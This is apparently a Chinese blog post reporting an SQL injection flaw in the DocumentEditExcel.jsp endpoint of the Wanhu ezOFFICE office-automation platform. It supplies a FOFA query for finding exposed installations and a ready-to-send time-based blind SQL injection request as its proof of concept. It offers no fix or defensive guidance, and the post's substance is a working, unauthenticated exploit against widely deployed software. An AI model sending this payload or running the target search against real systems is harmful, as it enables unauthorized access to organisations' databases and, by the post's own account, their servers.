万户 ezOFFICE DocumentEditExcel.jsp SQL注入漏洞

0x01 产品简介

万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

万户 ezOFFICE DocumentEditExcel.jsp接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。

0x03 复现环境

FOFA:app="万户ezOFFICE协同管理平台"

0x04 漏洞复现

PoC

GET /defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-31 09:38:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-31 09:38:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-31 09:38:02       82 阅读
  4. Python语言-面向对象

    2024-01-31 09:38:02       91 阅读

热门阅读

  1. 俄罗斯方块游戏设计文档(基于C语言)

    2024-01-31 09:38:02       59 阅读
  2. 头歌C语言指针进阶

    2024-01-31 09:38:02       42 阅读
  3. 洛谷p1216数字三角形

    2024-01-31 09:38:02       59 阅读
  4. 刷题09 双指针

    2024-01-31 09:38:02       59 阅读
  5. springboot3整合swagger

    2024-01-31 09:38:02       51 阅读
  6. C# LING查询语法学习,扩展方法的使用

    2024-01-31 09:38:02       41 阅读